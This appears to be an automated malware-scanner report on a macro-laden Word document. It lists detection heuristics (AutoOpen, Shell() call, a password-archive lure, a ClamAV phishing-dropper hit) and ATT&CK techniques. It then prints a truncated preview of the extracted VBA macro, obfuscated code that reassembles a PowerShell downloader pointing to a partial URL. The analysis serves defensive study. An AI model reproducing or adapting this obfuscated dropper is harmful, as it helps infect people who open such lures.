MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within its VBA macros. This, combined with the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic, suggests the macro is designed to execute arbitrary commands. The SE_PASSWORD_ARCHIVE_LURE heuristic and ClamAV detection as 'Img.Dropper.PhishingLure' strongly imply the document is a lure for a password-protected archive, intended to trick the user into opening a malicious payload.
Heuristics 8
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 74837 bytes |
SHA-256: 41f968f0cc2f47157888a34c034ac9a3b67cadb3e149b0b48cd1817cbfe98ef6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sJSaBGIOoChzj"
Function RESrBjcolH()
XMiGBajZfc = UCase("tKftFzh" + "uUiSLoD" + "GjUcqwN" + "AwFiXVB" + "bGSaJVfLIth") + UCase("wQFZEzqZuYLu" + "bsHrzfZTCrEWdr" + "DITzRfHjtfda" + "ciCuXdicYTJ" + "IPuZADbFF")
zRIisUj = Mid("ZEYEF2c+h2cSh2c+h2cplWRG3izmDU", 6, 16)
uQupMJ = UCase("szwnXns" + "zLmzQDpQh" + "qPaBjIRzcOwinM" + "mhvzhKztFZOV" + "jzdkOwpTcqToV") + UCase("KiURYZNiVuT" + "oqWUcSm" + "QfkOUqWSJrc" + "LkpPlIqw" + "CbjQOIwzIOA")
iMJhrbiF = UCase("lFOdRUIOLV" + "uqUpJzz" + "IfpKjJQM" + "scCUZGww" + "tMNTJInJNYa") + UCase("qEcwzqwufUBH" + "VjTjVkXsdFmwoV" + "XZvsmaBYZYcQ" + "CAYKGVn" + "TZsnCrMwpz")
OXPOjMQ = UCase("nXvMHCtCfDN" + "QNKcmLsFVk" + "JmRSWLZW" + "QwcEfkm" + "GjGBGzwdIqjS") + UCase("TICMlapjX" + "FjNISlGwBZGzm" + "ICmUpNVqDlw" + "ZrtJwCisBVtqd" + "BthtIUVYEjoVu")
idHDpNAVt = Mid("7jcItem(h2c+h2cUeZB+eZBJeZB+eZBhhh2c+h2cuaeZB+eZUmlE9iz9Pbfi", 3, 46)
YJtCPKr = UCase("UOXFYJUY" + "KuLsTXqdjc" + "SiHDADEkipZkY" + "wliuABlzTO" + "NzUfBjSNJp") + UCase("HUFVFjpilKmY" + "lMijbEVOtd" + "DjFhFHWPdKiJ" + "ivBIpcPbaztoA" + "mEUYNrTSViHY")
PWjSAwCjco = UCase("UPcbLcLP" + "scDQucn" + "wrzMcIJd" + "UBmKVbIYXmt" + "iAjlqpRED") + UCase("wRZrizzsGSw" + "IKdrXBvsWptq" + "qQblSsYYs" + "VkdzLbf" + "aUusWIwSQJL")
AGqbkza = UCase("NiThEJOQoc" + "HNQPqCXWa" + "rzXjbVIC" + "zjTipURDtwcV" + "pFciNWvNvmJSVk") + UCase("AdnGOCdiojavYw" + "XzlvISDtIlH" + "DwJMTjWDQK" + "HtMboznbWO" + "OMjaccwjf")
KHCPMritdf = Mid("35RGO7DiGTwZO'+'E)[1,3]+eZBxeZB-JOineZBeZB) ( ('+'(eZB. ( e'+'ZB+eZB([sTR'+'Ing]7c9VErbosEPreFeRE'+'nce)[1,3]+h2cxh2c-joinh2ch2c) ( (h2cUJ'+'hfh2c+h2cransbdhi8wnAifsp", 14, 140)
iIMRVPVWi = UCase("HXjZojV" + "oZZLQGHG" + "DkQqKTWWwuTmA" + "PMnwwBDIiFY" + "AujbQAsZMYvOz") + UCase("NCqmCUo" + "KwdJJFpvFKSTSb" + "WdSuaPqRYzuoB" + "sDECCklwH" + "mjRSkwdmlPTIk")
jiEWkKSEvNj = UCase("HdZhfXGLCv" + "NbdCwrPtU" + "kJmhwftG" + "GjfAAPmtJcjPT" + "DBlCXjlhq") + UCase("LWUnzirN" + "Johhadn" + "zGRotQqj" + "LcWaHZqVpdu" + "takTKKiVUKYjWo")
ErzzkEB = UCase("zEuLuPvGUj" + "hAWGDvjJ" + "zMAObFcLMtBU" + "ZwfJPkfwcisqFX" + "zNmdOZZmDjk") + UCase("nktaiombZbufw" + "kWiHXVizOwH" + "FWzJbcfvrM" + "INCTvDWTGhko" + "IwIOGoV")
OKWhfjC = Mid("fmGDp5ljT0U1td8hG][CHar]39)) eZB) -cRePLAce ([char]104+[char]50+[char]99),[char]39 -rEplaCEeZB7c9e'+'Z'+'B,[cha'+'r]36 -rEplaCE eZBxC6eZB,[char]92)) ') -CREPLace ([ChAr]114+[ChArh0ja4wC", 17, 164)
KARsIloBX = UCase("YVSGdETWPqi" + "OrMlAsK" + "fjViGLN" + "ADmETwRz" + "XRuZDVcjHP") + UCase("HZYrLkvsAjz" + "qIWLEZiQZ" + "OdbPibLs" + "wvjEafv" + "jDZwnXzERhJYG")
pPPaUAtVN = UCase("SGiPbQzRABmYnV" + "VBmvsfBrUhzAfT" + "oDrnpHTDU" + "WBFjwPOmCnNUt" + "QRONhdPTwjM") + UCase("hAjmBzRIVdvL" + "SiOdjDUJOX" + "sGVqYDCWTP" + "OGPlPCkHmVDr" + "vBpSjsZTc")
IbVRZZzuDR = UCase("RdlRcRnScujs" + "iDskNOatEtDO" + "JbqpIXlDS" + "bbpuFRFZNsrLO" + "pojkqNki") + UCase("PIMbnmI" + "hPLQIXUV" + "zUpVVzMizUq" + "NFHsYZm" + "qSmFmKwDrhQMP")
cVSRrztE = Mid("abFns4bch2c+h2c ih2eZB+eZBc+heZB+eZB2cnh2c+h2c Uh2c+h2cJhbcd'+')h2c+h2ceZB+eZB{try{eZB+eZBUJhh2c+h2cfh2c+h282Jqm4zQ5PWuYYlvrA", 7, 101)
DzLPhTc = UCase("uvbakSaZ" + "HjTHOunRZHkCp" + "GvWNkqapP" + "zVqobAoLwLjj" + "tbXsbAMrGEj") + UCase("fNEqjRRUhJ" + "EwpYSZFifaUdm" + "zzpDurQJ" + "wnkVNtRLt" + "iTtlctSAaBvK")
KNubqvCc = UCase("NPtitKztn" + "REUKDYkzh" + "lhhjiLBJqSE" + "mzrszpjbtzi" + "ohqlzTwSin") + UCase("jiJzhJqCUNn" + "WTLYvRFin" + "MvBVPJX" + "lzzTKJppwS" + "vKHAPTS")
JEsWq = UCase("nZBtiuz" + "FkwLzkkRqHOO" + "BRFJobZKAWmhb" + "ZWzzbGA" + "mTKFJAEjzLUPmI") + UCase("juTYXEOJdYjKur" + "nHpFilwi" + "YFQXbNLOQ" + "QDHicrYKhhZ" + "JspXMajiKlLAz")
VTbZA = Mid("zRpG1V/,hth2c+h2ctp:'+'/h2c+h2c/karh2ciw5amEUnMioNPP4hqw7K5YNJo4Jiqs7", 5, 34)
lznDziWf = UCase("uBAYEqiWNwMtj" + "wboSCICjFSn" + "ssEvmBzWdUk" + "udjmcrmZWQL" + "MwRJlLwilZz") + UCase("RSLKvKAiqOXY"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.